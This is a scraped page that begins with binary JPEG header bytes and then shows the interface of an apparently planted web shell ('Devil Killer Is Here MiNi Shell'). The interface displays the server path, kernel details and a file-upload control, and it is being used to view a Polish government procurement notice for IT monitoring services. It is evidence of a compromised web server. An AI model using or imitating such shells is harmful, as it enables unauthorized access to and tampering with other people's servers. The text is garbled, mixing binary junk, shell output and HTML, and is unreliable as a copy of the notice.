JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251015/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251015/0047759901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Monitorowanie i asysta techniczna IT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Inspektorat Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000861593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bitwy Warszawskiej 1920 roku nr 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.winnicki@gios.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gov.pl/gios</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Monitorowanie i asysta techniczna IT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7da90c7c-9a3c-4a95-8238-3ac49b658a1f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00477599</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00158566/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Monitorowanie i asysta techniczna IT</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-gios.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy<br/>zakupowej zamawiającego pod adresem:<br/>https://zamowienia-<br/>gios.ezamawiajacy.pl.<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. poz. 2452)<br/>(Dalsza część w wymaganiac technicznych i organizajnych dot. korespondencji elektronicznej w niniejszym ogłoszeniu)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: Ciąg dalszy:<br/>3. Dokumentacja niniejszego postępowania została opublikowana na platformie zakupowej. W celu zapoznania się z dokumentacją<br/>postępowania Wykonawca po przejściu na dedykowany adres platformy zakupowej:<br/>- do upływu terminu składania ofert przechodzi do zakładki „Lista ogłoszonych postępowań”, wybiera zakładkę „Aktualne” i<br/>wyszukuje przedmiotowe postępowanie,<br/>- po upływie terminu składania ofert przechodzi do zakładki „Lista ogłoszonych postępowań”, wybiera zakładkę „Archiwalne” i<br/>wyszukuje przedmiotowe postępowanie.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub, w przypadku<br/>posiadania konta w platformie zakupowej, logując się, akceptuje regulamin zamieszczony na stronie internetowej: zakupowej<br/>wynikające z Instrukcji korzystania z platformy zakupowej Wykonawcy (Instrukcja użytkownika). Instrukcja dostępna jest pod<br/>adresem:<br/>https://zamowienia- gios.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesLi<br/>st&amp;clientName=zamowienia-gios&amp;USER_MENU_HOVER=publicFilesList<br/>W celu wejścia na platformę zakupową umożliwiającą m.in. zapoznanie się z treścią SWZ, złożenie oferty, wymagane jest uprzednie<br/>zalogowanie. Wykonawcy, którzy nie założyli konta, zobligowani są do uprzedniej, bezpłatnej rejestracji. Szczegóły rejestracji<br/>wskazane są w Instrukcji korzystania z platformy zakupowej. Proces rejestracji trwa maksymalnie do 2 dni roboczych. Zamawiający<br/>zaleca więc Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>Ważne – oferta zapisana na platformie zakupowej nie oznacza, że została ona<br/>złożona. Zapisanie oferty daje użytkownikowi czas, na wprowadzenie<br/>ewentualnych poprawek, uzupełnień, dołączenie dodatkowych załączników.<br/>Dopiero wybór ikony ZŁÓŻ OFERTĘ/WNIOSEK oznacza złożenie oferty/wniosku zgodnie z przepisami ustawy Pzp.<br/>5. W prowadzonym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy<br/>przekazują za pomocą platformy zakupowej pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ<br/>za pośrednictwem platformy zakupowej. Treść zapytań wraz z wyjaśnieniami treści SWZ będzie zamieszczana na stronie<br/>internetowej Zamawiającego za pośrednictwem platformy zakupowej pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>7. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do<br/>Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego<br/>terminu (wczytanie na platformie zakupowej).<br/>8. Za datę wpływu oferty, oświadczeń wniosków, zawiadomień oraz informacji przekazywanych przez Wykonawcę i Zamawiającego<br/>przyjmuje się datę i godzinę wczytania na platformie zakupowej.<br/>9. Jeśli w niniejszej Specyfikacji Warunków Zamówienia jest mowa o opatrzeniu / podpisaniu dokumentu / oświadczenia<br/>kwalifikowanym podpisem elektronicznym,<br/>Zamawiający wymaga, aby kwalifikowany podpis elektroniczny wystawiony był przez dostawcę kwalifikowanej usługi zaufania,<br/>będącego podmiotem świadczącym usługi certyfikowane – podpis elektroniczny, spełniające wymogi bezpieczeństwa określone<br/>elektronicznej (Dz.U. z 2020 r. poz. 1173 – t.j.). Szczegółowe informacje o sposobie pozyskania usługi kwalifikowanego podpisu<br/>elektronicznego oraz warunkach jej<br/>użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których lista znajduje się pod adresem<br/>internetowym http://www.nccert.pl 10. Zamawiający dopuszcza w szczególności następujące formaty danych, dokumentów<br/>i oświadczeń: doc, docx, pdf, xml.2, opatrzone (poza Platformą) kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>RESZTA INFORMACJI W SWZ - ROZDZIAŁ XI</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: I. Klauzula informacyjna dotycząca przetwarzania danych osobowych przez Główny<br/>Inspektorat Ochrony Środowiska w celu wyboru<br/>najkorzystniejszej oferty Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych- RODO),<br/>(Dz. U. UE. L. z 2016 r. Nr 119, str. 1 z późn. zm.), podajemy następujące informacje:<br/>1. Administratorem Pani/Pana danych osobowych jest Główny Inspektor Ochrony Środowiska z siedzibą w Warszawie, z którym<br/>może się Pani/Pan kontaktować w następujący sposób: listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy<br/>Warszawskiej 1920 r. 3;<br/>Elektroniczna Skrzynka Podawcza ePUAP: /gios/SkrytkaESP<br/>telefonicznie na nr 22 577 53 80;<br/>e-mail: gios@gios.gov.pl<br/>adres do doręczeń elektronicznych AE:PL-67072-24050-IURUS-21.<br/>Główny Inspektor Ochrony Środowiska wyznaczył Inspektora Ochrony Danych do<br/>kontaktu w sprawach dotyczących przetwarzania danych osobowych oraz realizacji<br/>praw związanych z przetwarzaniem danych, z którym można kontaktować się:<br/>listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy<br/>Warszawskiej 1920 r. 3;<br/>telefonicznie na nr 22 577 53 75;<br/>e-mail: iod@gios.gov.pl<br/>Podstawą prawną przetwarzania Pani/Pana danych osobowych w szczególności<br/>jest:<br/>art. 6 ust. 1 lit. b) RODO t j. przetwarzanie jest niezbędne w celu zawarcia i<br/>realizacji umowy oraz art. 6 ust. 1 lit. c) RODO tj. przetwarzanie jest<br/>niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze,<br/>ustawa z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz. U. z<br/>2019 r. poz. 1781),<br/>ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz.<br/>U. z 2024 r. poz. 1320), zwana dalej „ustawą Prawo zamówień publicznych”,<br/>ustawa z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz. U. z 2024<br/>r. poz. 1530),<br/>ustawa z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz.<br/>120, z późn. zm.),<br/>ustawa z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. z 2024 r. poz.<br/>1061,z późn. zm.).<br/>4. Pani/Pana dane osobowe będą przetwarzane w celu wyboru najkorzystniejszej<br/>oferty w postępowaniu prowadzonym na podstawie przepisów ustawy Prawo<br/>zamówień publicznych.<br/>5. Odbiorcą Pani/Pana danych osobowych mogą być podmioty upoważnione do<br/>przetwarzania danych osobowych na podstawie przepisów prawa<br/>powszechnie obowiązującego, w tym osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz<br/>art. 74 ustawy Prawo zamówień publicznych. Dodatkowo informacje związane<br/>z postępowaniem są zamieszczane na platformie Marketplanet. W<br/>uzasadnionych przypadkach dane osobowe zostaną przekazane podmiotom,<br/>z którymi administrator zawarł umowę powierzenia przetwarzania danych<br/>osobowych w szczególności podmiotom świadczącym usługi w zakresie<br/>systemów informatycznych/ oprogramowania.<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do<br/>wykonania Umowy, celów przetwarzania danych osobowych, dochodzenia<br/>roszczeń, obrony przez roszczeniami oraz wykonania zadań wynikających z ustaw szczególnych, w tym ustawy z dnia 14 lipca 1983<br/>r. o narodowym<br/>zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164, z późn. zm.).<br/>7. Przysługuje Pani/Panu prawo do żądania od administratora: dostępu<br/>do danych osobowych, sprostowania oraz ograniczenia przetwarzania,<br/>jeśli nie będą zachodziły przeciwskazania prawne 8. W przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>narusza przepisy RODO ma Pani/Pan prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych.<br/>DALSZA CZĘŚĆ W ROZDZIALE XXV SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>a) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów<br/>zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu<br/>terminu na ich wniesienie;<br/>b) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o<br/>których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia,<br/>seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia;<br/>c) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach,<br/>o których mowa w art. 46 RODO,<br/>związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od<br/>administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osby występującej z żądaniem<br/>wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>d) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do<br/>sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>e) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>f) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w<br/>art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG-WZP.26.1.71.2025.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 571501,14 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Monitorowanie i asysta techniczna IT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72253200-5 - Usługi w zakresie wsparcia systemu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>Lp.	Kryterium	Liczba punktów (waga kryterium)<br/>1.	Cena oferty brutto	75<br/>2.	Liczba bezpłatnych, dodatkowych godzin dostępnych w puli miesięcznej	25<br/><br/>2.	Sposób oceny oferty:<br/>a)	Punkty przyznane za kryterium „Cena oferty brutto” liczone będą wg następującego wzoru:<br/>C = (Cn : Cb) × 0,75 x 100 = X pkt<br/><br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 75 pkt.<br/><br/>b)	Punkty przyznane za kryterium „Liczba bezpłatnych, dodatkowych godzin dostępnych w puli miesięcznej” liczone będą wg następującego wzoru:<br/>a) Wykonawca nie zaoferuje bezpłatnych godzin dodatkowych - Wykonawca uzyska 0 pkt<br/>b) Wykonawca zaoferuję 10 bezpłatnych godzin dodatkowych - Wykonawca uzyska 10 pkt<br/>c) Wykonawca zaoferuję 20 bezpłatnych godzin dodatkowych - Wykonawca uzyska 15 pkt<br/>d) Wykonawca zaoferuję nielimitowaną liczbę bezpłatnych godzin dodatkowych - Wykonawca uzyska 25 pkt <br/>Wykonawca wybiera w ramach opcję jedną z powyższych tj. a) albo b), albo c) albo d) tj. w kryterium wpisuje „nie zaoferuje” albo „10” albo „20” albo „nielimitowane godziny”. Wskazanie innej opcji niż wskazne w legendzie kryterium będzie skutkować przyznaniem 0 punktów.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 25 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">75</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba bezpłatnych, dodatkowych godzin dostępnych w puli miesięcznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek nr 1:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich 5<br/>(pięciu) lat przed upływem składania ofert, a jeśli okres prowadzenia działalności<br/>jest krótszy - w tym okresie wykonał należycie usługi:<br/> co najmniej dwie usługi polegające na utrzymaniu ciągłości działania<br/>infrastruktury IT lub na monitorowaniu środowiska IT lub na świadczeniu<br/>asysty technicznej lub wsparcia technicznego dla środowiska IT, przy<br/>czym:<br/> każda z usług była realizowana przez okres co najmniej 24 miesięcy w<br/>sposób ciągły,<br/> dopuszcza się, aby okres 24 miesięcy wynikał z dwóch następujących<br/>po sobie umów zawartych z tym samym Zamawiającym, obejmujących<br/>świadczenie tożsamych usług (np. dwóch następujących po sobie – bez<br/>przerwy – umów, po 12 miesięcy każda).<br/><br/>Warunek nr 2:<br/><br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej następującymi osobami spełniającymi następujące wymagania:<br/>- co najmniej 1 osoba musi być specjalistą od wirtualizacji Vmware;<br/>- co najmniej 1 osoba musi być specjalistą od systemów operacyjnych Linux (w tym RedHat);<br/>- co najmniej 1 osoba musi być specjalistą od baz danych PostgreSQL;<br/>- co najmniej 1 osoba musi być specjalistą od baz danych MySql;<br/>- co najmniej 1 osoba musi być specjalistą od systemów Windows;<br/>- co najmniej 1 osoba musi być specjalistą od urządzeń serwerowych i macierzy Hewlett-Packard;<br/>- co najmniej 1 osoba musi być specjalistą od urządzeń serwerowych i macierzy Fujitsu;<br/>- co najmniej 1 osoba musi być specjalistą od urządzeń macierzy IBM;<br/>- co najmniej 1 osoba musi być specjalistą od urządzeń serwerowych Dell;<br/>- co najmniej 1 osoba musi być specjalistą od oprogramowania pocztowego Axigen;<br/>- co najmniej 1 osoba musi być specjalistą od oprogramowania Microsoft Exchange;<br/><br/>Powyższe wszystkie 